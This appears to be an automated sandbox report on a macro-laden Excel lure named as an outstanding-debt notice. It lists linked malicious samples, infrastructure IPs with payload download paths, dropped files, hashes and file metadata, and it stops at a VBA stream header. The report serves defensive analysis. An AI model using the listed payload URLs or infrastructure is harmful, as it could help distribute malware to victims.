                                                                                                                                                • Close Viewer
                                                                                                                                                Warnings:
                                                                                                                                                Show All
                                                                                                                                                • Excluded IPs from analysis (whitelisted): 93.184.220.29, 13.88.21.125, 20.82.210.154, 204.79.197.200, 13.107.21.200, 13.64.90.137, 104.42.151.234, 92.122.145.220, 52.109.32.63, 52.109.8.24, 52.109.88.40, 184.30.24.56, 92.122.213.247, 92.122.213.194, 20.54.26.129
                                                                                                                                                • Excluded domains from analysis (whitelisted): cs9.wac.phicdn.net, arc.msn.com.nsatc.net, prod-w.nexus.live.com.akadns.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, ocsp.digicert.com, www-bing-com.dual-a-0001.a-msedge.net, arc.trafficmanager.net, nexus.officeapps.live.com, officeclient.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, www.bing.com, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, dual-a-0001.a-msedge.net, prod.configsvc1.live.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, skypedataprdcolwus16.cloudapp.net, europe.configsvc1.live.com.akadns.net
                                                                                                                                                • Report size getting too big, too many NtSetInformationFile calls found.

                                                                                                                                                Simulations

                                                                                                                                                Behavior and APIs

                                                                                                                                                No simulations

                                                                                                                                                Joe Sandbox View / Context

                                                                                                                                                IPs

                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                91.211.91.81Outstanding-Debt-1636503299-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 91.211.91.81/44313,6048108796.dat
                                                                                                                                                Outstanding-Debt-1636503299-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 91.211.91.81/44313,6048108796.dat
                                                                                                                                                Outstanding-Debt-1636503299-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 91.211.91.81/44313,6048108796.dat
                                                                                                                                                5.34.179.36Outstanding-Debt-439798376-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 5.34.179.36/44313,6048108796.dat
                                                                                                                                                Outstanding-Debt-1636503299-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 5.34.179.36/44313,6048108796.dat
                                                                                                                                                Outstanding-Debt-1636503299-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 5.34.179.36/44313,6048108796.dat
                                                                                                                                                Outstanding-Debt-1636503299-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 5.34.179.36/44313,6048108796.dat
                                                                                                                                                45.153.229.23Outstanding-Debt-439798376-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 45.153.229.23/44313,6048108796.dat
                                                                                                                                                Outstanding-Debt-1636503299-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 45.153.229.23/44313,6048108796.dat
                                                                                                                                                Outstanding-Debt-1636503299-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 45.153.229.23/44313,6048108796.dat
                                                                                                                                                Outstanding-Debt-1636503299-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 45.153.229.23/44313,6048108796.dat

                                                                                                                                                Domains

                                                                                                                                                No context

                                                                                                                                                ASN

                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                GREENFLOID-ASUAOutstanding-Debt-439798376-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 5.34.179.36
                                                                                                                                                Outstanding-Debt-1636503299-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 5.34.179.36
                                                                                                                                                Outstanding-Debt-1636503299-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 5.34.179.36
                                                                                                                                                Outstanding-Debt-1636503299-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 5.34.179.36
                                                                                                                                                tetup.exeGet hashmaliciousBrowse
                                                                                                                                                • 107.181.174.176
                                                                                                                                                ba820cf3_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                • 195.123.238.191
                                                                                                                                                a8331229_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                • 195.123.238.191
                                                                                                                                                5f0e0f15_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                • 195.123.238.191
                                                                                                                                                2f50000.exeGet hashmaliciousBrowse
                                                                                                                                                • 45.90.59.62
                                                                                                                                                9177284661-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 82.118.21.70
                                                                                                                                                9177284661-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 82.118.21.70
                                                                                                                                                9177284661-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 82.118.21.70
                                                                                                                                                EgW5u2WYG2.exeGet hashmaliciousBrowse
                                                                                                                                                • 45.134.255.99
                                                                                                                                                7IXb5bOTOQ.exeGet hashmaliciousBrowse
                                                                                                                                                • 45.134.255.61
                                                                                                                                                DU61r0xvZ7.exeGet hashmaliciousBrowse
                                                                                                                                                • 82.118.23.184
                                                                                                                                                TNT SHIPPING DOC 6753478364.exeGet hashmaliciousBrowse
                                                                                                                                                • 91.90.195.7
                                                                                                                                                10ba8cb2_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                • 195.123.238.191
                                                                                                                                                SThy2G7fGR.exeGet hashmaliciousBrowse
                                                                                                                                                • 45.134.255.61
                                                                                                                                                65cb803d8339bc32863bd557a882cf2016ad7945b18f3.exeGet hashmaliciousBrowse
                                                                                                                                                • 45.134.255.61
                                                                                                                                                73827110_by_Libranalysis.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 45.90.59.97
                                                                                                                                                HOSTFORYUAOutstanding-Debt-439798376-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 91.211.91.81
                                                                                                                                                Outstanding-Debt-1636503299-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 91.211.91.81
                                                                                                                                                Outstanding-Debt-1636503299-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 91.211.91.81
                                                                                                                                                Outstanding-Debt-1636503299-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 91.211.91.81
                                                                                                                                                Complaint-1770799750-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 2.56.244.189
                                                                                                                                                Complaint-1770799750-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 2.56.244.189
                                                                                                                                                Complaint-1505499457-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 2.56.244.189
                                                                                                                                                Complaint-1770799750-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 2.56.244.189
                                                                                                                                                Complaint-1505499457-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 2.56.244.189
                                                                                                                                                Complaint-1505499457-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 2.56.244.189
                                                                                                                                                Complaint-937314470-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 2.56.244.189
                                                                                                                                                Complaint-937314470-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 2.56.244.189
                                                                                                                                                Complaint-793844517-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 2.56.244.189
                                                                                                                                                Complaint-937314470-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 2.56.244.189
                                                                                                                                                Complaint-793844517-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 2.56.244.189
                                                                                                                                                Complaint-793844517-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 2.56.244.189
                                                                                                                                                284225b9_by_Libranalysis.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 91.211.91.71
                                                                                                                                                284225b9_by_Libranalysis.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 91.211.91.71
                                                                                                                                                284225b9_by_Libranalysis.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 91.211.91.71
                                                                                                                                                9963433036-04282021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 91.211.91.71

                                                                                                                                                JA3 Fingerprints

                                                                                                                                                No context

                                                                                                                                                Dropped Files

                                                                                                                                                No context

                                                                                                                                                Created / dropped Files

                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\D3813350-B159-4E3E-AD21-A99C8C4A3C67
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):134558
                                                                                                                                                Entropy (8bit):5.368400986924368
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:CcQIKNEHBXA3gBwlpQ9DQW+zhh34ZldpKWXboOilX5ErLWME9:pEQ9DQW+zPXO8
                                                                                                                                                MD5:14CB15476667FC677DCF673B8D278DB4
                                                                                                                                                SHA1:26804A658308E4162701DBA08E5952DB8CAC6F92
                                                                                                                                                SHA-256:7DC06C55AE50F4E01F7F6B6557F4235817E1336BFB2D61ACD0154E414A77AF68
                                                                                                                                                SHA-512:04DE2B08BABC9533A335847CB380215B54455ECEC3E2F741B8518F20903EDD5DE3C9BF6ABB476262748D685997B0F588C35AEF6526DB8740AF52BDFFD63101BA
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-05-04T16:08:59">.. Build: 16.0.14102.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\EA7806F3.jpg
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                File Type:[TIFF image data, big-endian, direntries=5], baseline, precision 8, 1080x1080, frames 3
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):92379
                                                                                                                                                Entropy (8bit):7.654577060340879
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:1o1vutINbjOXGw548LBkVb/oyrKXkX89DcO9GQSnIv+C1EDFVxkR7Y90:wvKINbjvw548LMb/oqKO8NnS8+60Kc0
                                                                                                                                                MD5:4A425E6A5A885C0D0E2589506FD2244B
                                                                                                                                                SHA1:E23482422480A4720E22F311B42BD65E2F3556F8
                                                                                                                                                SHA-256:76E685FC2035D8CF19945C6686D82054B64D0A9612853D8F428C4B4FE351C160
                                                                                                                                                SHA-512:3C827E13A12CC817CBD80EA7C89BEC5288FD21250728E76E00D6355008F704C77EC9BC37C85FF076D8D1F960DB53741F352AB649CD2C754B71B4D11CFFBEEA54
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:moderate, very likely benign file
                                                                                                                                                Preview: ......JFIF.....`.`.....ZExif..MM.*.................J............Q...........Q...........Q..........................C....................................................................C.......................................................................8.8.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..D.G.\.....i].......k.@U.........B..Hw.A...`p;.RsIRHTs..%G?QU.#..$..."...U.A....g].s......c..,....{W'..M.Nc....F.~..y..l..`.e..a..[...P.y]..k_..CI..z.Ru..s.6.Y....."..1]Q......e#.......~.`sk..KH......p.4.i.j+3{.....N.DS..L.....o..o.5f>..jY.uS...Z.B...UG`)..6D....(.....
                                                                                                                                                C:\Users\user\AppData\Local\Temp\6AB10000
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):119862
                                                                                                                                                Entropy (8bit):7.698217832306648
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3072:XTyVmBXm4vKINbjvw548LMb/oqKO8NnS8+60KcrK:XYzdAbT648LM7D98Np+EEK
                                                                                                                                                MD5:795AA6C6C8C2F3B6E3DC9C110E346FD0
                                                                                                                                                SHA1:B6F700291CA584D73BF0B7083489BE3F3B949C2E
                                                                                                                                                SHA-256:6ACC1A3B661546617557C456B52C28135B49166A2D9E0216EC0CBCCFF742BCEF
                                                                                                                                                SHA-512:51C075AD5820E3E5F051EA32D9E247423CB9AC863E71D2C920F0952D9E9834135AF9187BC89D868457A8C2BA04070779ED87235AEEC7C8307BE097D23E37E67F
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview: .U.n.1.}...X..Z..RUU,yh..6R..0..k.M.C..;6..)..@...s..x..fet........#R..N*.6...}..T1q+.v....Hn&.?....b..66.K..c,.....y..2s.....e...o.].F_.p6.Mu..d2......[..M&SeI.}._.j..^+..&.V.#..l..H'..B...p.;.d4.A!cx..PX$l/g....nUQ.,..N.....`.+.U.....].2..s.m...;......,.[i...b......4....MK..".;..p.+.*..S....N...K.o`VR...q...(..Z....E..........<..NV.pz.+......./...x....1w<.|L8..'.'vO.2...>._.-.@....i..)..n.".~....q...vh.. ...m..w.....#...`g%.............nV.~........PK..........!.........*.......[Content_Types].xml ...(.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):170164
                                                                                                                                                Entropy (8bit):4.365666431497712
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:fhKyLzolWWpFpKKHAeedydju4HTbTuo+o5aQxJudUl9yhQL3oKmmy:fhng8WpFpKKHHedydFeo+oQLUlPoK0
                                                                                                                                                MD5:BD9DFD5B332F975E18DFE18656B915A9
                                                                                                                                                SHA1:6249B0B2EBC57365B6CD37C56E3F449323990419
                                                                                                                                                SHA-256:3F2ACEBD4C2E72E011919114F3744A1D98FFCDC42E4BADBF6674CEE6BA1A1C4E
                                                                                                                                                SHA-512:B1CC4131EC4777228B61C22713082D5E715899CDB903914BF929D1324743DD6390E223E8C63340013888B392BB3FF1532C297876B4E348412002711D7D01E9C9
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview: MSFT................Q................................$......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0*...*...*..\+...+..$,...,...,..P-...-......|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8...8...9..l9...9..4:...:...:..`;...;..(<...<...<..T=...=...>...>...>..H?...?...@..t@...@..<A...A...B..hB.......l...B..........................$................................................ ...............................x...I..............T........................................... ...................................................
                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 17:34:24 2019, mtime=Wed May 5 00:09:05 2021, atime=Wed May 5 00:09:05 2021, length=12288, window=hide
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):909
                                                                                                                                                Entropy (8bit):4.677008770935126
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12:8iVJRUdAUj6CHiMGS1bGXJDSG1+W+jA0/y1bDyPq5LkeGLkeM4t2Y+xIBjKZm:8iPBB+Sl1GA0KJDyPG7aB6m
                                                                                                                                                MD5:D8CD3DF57143A96A9575B4342CD6D86D
                                                                                                                                                SHA1:883AA9B41A20B70FD4838ADACD176B5576C27A0F
                                                                                                                                                SHA-256:EDB8A1DA7B7E59BF10687B085D969B2913858F1842389D9061CB77CCC0CD86D7
                                                                                                                                                SHA-512:86BF2C338B5CFB8691DD4125C100716CD4A3C75F4D6A08B957B4942523C329370A9B10F7245181E6E3A8D98D288E3CD671831FE4C092E55E70E6C54836946380
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview: L..................F............-..A}o>KA..A}o>KA...0......................y....P.O. .:i.....+00.../C:\...................x.1......Ng...Users.d......L...R......................:......B..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....T.1.....>Q.u..user..>.......NM..R.......S....................:...a.l.f.o.n.s.....~.1......R#...Desktop.h.......NM..R#......Y..............>.......=.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......F...............-.......E...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Aw...`.......X.......980108...........!a..%.H.VZAj...q.I..........W...!a..%.H.VZAj...q.I..........W..............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Outstanding-Debt-439798376-05042021.LNK
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 13:47:04 2020, mtime=Wed May 5 00:09:05 2021, atime=Wed May 5 00:09:05 2021, length=119848, window=hide
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):2380
                                                                                                                                                Entropy (8bit):4.738296738797264
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:8ftxB+SZ+NIHWwM/KVOw/B6pftxB+SZ+NIHWwM/KVOw/B6:8fDsTu2wjVOw/KfDsTu2wjVOw/
                                                                                                                                                MD5:97949C954CE095CB324ECEFBEE868286
                                                                                                                                                SHA1:86C50B4C3DFC5D0F8900B0624575E15C10BEBD0F
                                                                                                                                                SHA-256:0A54A3A0004D7A9C022478364384E94B5C6D51C8033BEF405EA9B9E52C6A9B58
                                                                                                                                                SHA-512:A0D7D0E4DFA4B4A0893C475F2C671FD397DD0349010BB46930BACF5C7954D3716425ACCE940030D7854EC2B350EF5E5025AD026DED2E4D648D2A83B57ACA28E0
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview: L..................F.... ......8.....y>KA..P.v>KA..(............................P.O. .:i.....+00.../C:\...................x.1......Ng...Users.d......L...R......................:......B..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....T.1.....>Q.u..user..>.......NM..R.......S....................:...a.l.f.o.n.s.....~.1.....>Q.u..Desktop.h.......NM..R.......Y..............>.....A...D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2......R.. .OUTSTA~1.XLS.........>Q.u.R......f.........................O.u.t.s.t.a.n.d.i.n.g.-.D.e.b.t.-.4.3.9.7.9.8.3.7.6.-.0.5.0.4.2.0.2.1...x.l.s.m.......o...............-.......n...........>.S......C:\Users\user\Desktop\Outstanding-Debt-439798376-05042021.xlsm..?.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.O.u.t.s.t.a.n.d.i.n.g.-.D.e.b.t.-.4.3.9.7.9.8.3.7.6.-.0.5.0.4.2.0.2.1...x.l.s.m.........:..,.LB.)...Aw...`.......X.......980108...........!a..%.H.VZAj...xZt.+........W...!a..%.H.VZAj...xZt.+........W..............1SPS.XF.L8C
                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):160
                                                                                                                                                Entropy (8bit):4.99317301468297
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:oyBVomxWhl2BebSsfVK6lyEW92BebSsfVK6lmxWhl2BebSsfVK6lv:djSlvbn7W9vbn/lvbn1
                                                                                                                                                MD5:5E205DBC3BCAB5A0D70D50B374BB9CEE
                                                                                                                                                SHA1:38631AFD0A8C1748F8715186742B2EB108058820
                                                                                                                                                SHA-256:5F31907B64FB6E9C02FB0DB01E0C79DF44343CA4C22C6A25687BB9A7BC25842A
                                                                                                                                                SHA-512:0A1B8CA8D34E5E5285E0D440EA8DFCB25355BF7E6893417874F66AE4E1704B2E9A228068047817F829F8A8C1239A5261087FCA3565E2BAA846750E2D062E6811
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview: Desktop.LNK=0..[misc]..Outstanding-Debt-439798376-05042021.LNK=0..Outstanding-Debt-439798376-05042021.LNK=0..[misc]..Outstanding-Debt-439798376-05042021.LNK=0..
                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                File Type:Little-endian UTF-16 Unicode text, with CR line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):22
                                                                                                                                                Entropy (8bit):2.9808259362290785
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:QAlX0Gn:QKn
                                                                                                                                                MD5:7962B839183642D3CDC2F9CEBDBF85CE
                                                                                                                                                SHA1:2BE8F6F309962ED367866F6E70668508BC814C2D
                                                                                                                                                SHA-256:5EB8655BA3D3E7252CA81C2B9076A791CD912872D9F0447F23F4C4AC4A6514F6
                                                                                                                                                SHA-512:2C332AC29FD3FAB66DBD918D60F9BE78B589B090282ED3DBEA02C4426F6627E4AAFC4C13FBCA09EC4925EAC3ED4F8662FDF1D7FA5C9BE714F8A7B993BECB3342
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:high, very likely benign file
                                                                                                                                                Preview: ....p.r.a.t.e.s.h.....
                                                                                                                                                C:\Users\user\Desktop\1BB10000
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):119848
                                                                                                                                                Entropy (8bit):7.6985422862839865
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3072:hyEkPabvKINbjvw548LMb/oqKO8NnS8+60KcrZ:1kPXAbT648LM7D98Np+EEZ
                                                                                                                                                MD5:D21F0B6DB2C9439A9315F79D1884CC37
                                                                                                                                                SHA1:A7354F1452B8A7D37D6C75A46528948C50830278
                                                                                                                                                SHA-256:AF2C3D97DA8ECD3574452BBF44EE07E998063F9D44242FFE62D670CCEC7C71D0
                                                                                                                                                SHA-512:C035D70207AEE7BB932A61BC7D69432DF7D6149224A15E44635969A9952672EDF24270F5DF105ADF2C2F37D24C02FD600D8C03503129D03FC7C5013D26D7A28C
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview: .U.n.1.}...X..Z..RUU,yh..6R..0..k.M.C..;6..)..@...s..x..fet........#R..N*.6...}..T1q+.v....Hn&.?....b..66.K..c,.....y..2s.....e...o.].F_.p6.Mu..d2......[..M&SeI.}._.j..^+..&.V.#..l..H'..B...p.;.d4.A!cx..PX$l/g....nUQ.,..N.....`.+.U.....].2..s.m...;......,.[i...b......4....MK..".;..p.+.*..S....N...K.o`VR...q...(..Z....E..........<..NV.pz.+......./...x....1w<.|L8..'.'vO.2...>._.-.@....i..)..n.".~....q...vh.. ...m..w.....#...`g%.............nV.~........PK..........!.........*.......[Content_Types].xml ...(.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\Desktop\~$Outstanding-Debt-439798376-05042021.xlsm
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):330
                                                                                                                                                Entropy (8bit):1.6081032063576088
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:RFXI6dtBhFXI6dtt:RJZhJ1
                                                                                                                                                MD5:836727206447D2C6B98C973E058460C9
                                                                                                                                                SHA1:D83351CF6DE78FEDE0142DE5434F9217C4F285D2
                                                                                                                                                SHA-256:D9BECB14EECC877F0FA39B6B6F856365CADF730B64E7FA2163965D181CC5EB41
                                                                                                                                                SHA-512:7F843EDD7DC6230BF0E05BF988D25AE6188F8B22808F2C990A1E8039C0CECC25D1D101E0FDD952722FEAD538F7C7C14EEF9FD7F4B31036C3E7F79DE570CD0607
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:high, very likely benign file
                                                                                                                                                Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                                                                Static File Info

                                                                                                                                                General

                                                                                                                                                File type:Microsoft Excel 2007+
                                                                                                                                                Entropy (8bit):7.68857711695949
                                                                                                                                                TrID:
                                                                                                                                                • Excel Microsoft Office Open XML Format document with Macro (57504/1) 54.50%
                                                                                                                                                • Excel Microsoft Office Open XML Format document (40004/1) 37.92%
                                                                                                                                                • ZIP compressed archive (8000/1) 7.58%
                                                                                                                                                File name:Outstanding-Debt-439798376-05042021.xlsm
                                                                                                                                                File size:116934
                                                                                                                                                MD5:4131b71c0f1d082edb34c766188d10b1
                                                                                                                                                SHA1:4d6afffcd7ba91815cc9d8e0427123aa63bd93a8
                                                                                                                                                SHA256:c985fb8f434d7ed9d9844c8770e6c1b1d00d49de4dd6fcc4a8c4fc77be3080f7
                                                                                                                                                SHA512:4ed05fbe708655894135ce7abe470dd4e83d15b98cc46f865bc53d7748f6d15fa2a7384f22b03d1c479bfc6d7bbd97cc2fe6b8e63c71abc59e4019ad57012e00
                                                                                                                                                SSDEEP:3072:VkYvKINbjvw548LMb/oqKO8NnS8+60Kc+ECx:2AbT648LM7D98Np+EdECx
                                                                                                                                                File Content Preview:PK..........!."..R....*.......[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                                                                                File Icon

                                                                                                                                                Icon Hash:74ecd0e2f696908c

                                                                                                                                                Static OLE Info

                                                                                                                                                General

                                                                                                                                                Document Type:OpenXML
                                                                                                                                                Number of OLE Files:1

                                                                                                                                                OLE File "/opt/package/joesandbox/database/analysis/404106/sample/Outstanding-Debt-439798376-05042021.xlsm"

                                                                                                                                                Indicators

                                                                                                                                                Has Summary Info:False
                                                                                                                                                Application Name:unknown
                                                                                                                                                Encrypted Document:False
                                                                                                                                                Contains Word Document Stream:
                                                                                                                                                Contains Workbook/Book Stream:
                                                                                                                                                Contains PowerPoint Document Stream:
                                                                                                                                                Contains Visio Document Stream:
                                                                                                                                                Contains ObjectPool Stream:
                                                                                                                                                Flash Objects Count:
                                                                                                                                                Contains VBA Macros:True

                                                                                                                                                Summary

                                                                                                                                                Author:Rabota
                                                                                                                                                Last Saved By:Noped
                                                                                                                                                Create Time:2015-06-05T18:19:34Z
                                                                                                                                                Last Saved Time:2021-05-04T08:11:27Z
                                                                                                                                                Creating Application:Microsoft Excel
                                                                                                                                                Security:0

                                                                                                                                                Document Summary

                                                                                                                                                Thumbnail Scaling Desired:false
                                                                                                                                                Company:
                                                                                                                                                Contains Dirty Links:false
                                                                                                                                                Shared Document:false
                                                                                                                                                Changed Hyperlinks:false
                                                                                                                                                Application Version:16.0300

                                                                                                                                                Streams with VBA

                                                                                                                                                VBA File Name: Blasr.bas, Stream Size: 1166
                                                                                                                                                General
                                                                                                                                                Stream Path:VBA/Blasr
                                                                                                                                                VBA File Name:Blasr.bas
                                                                                                                                                Stream Size:1166
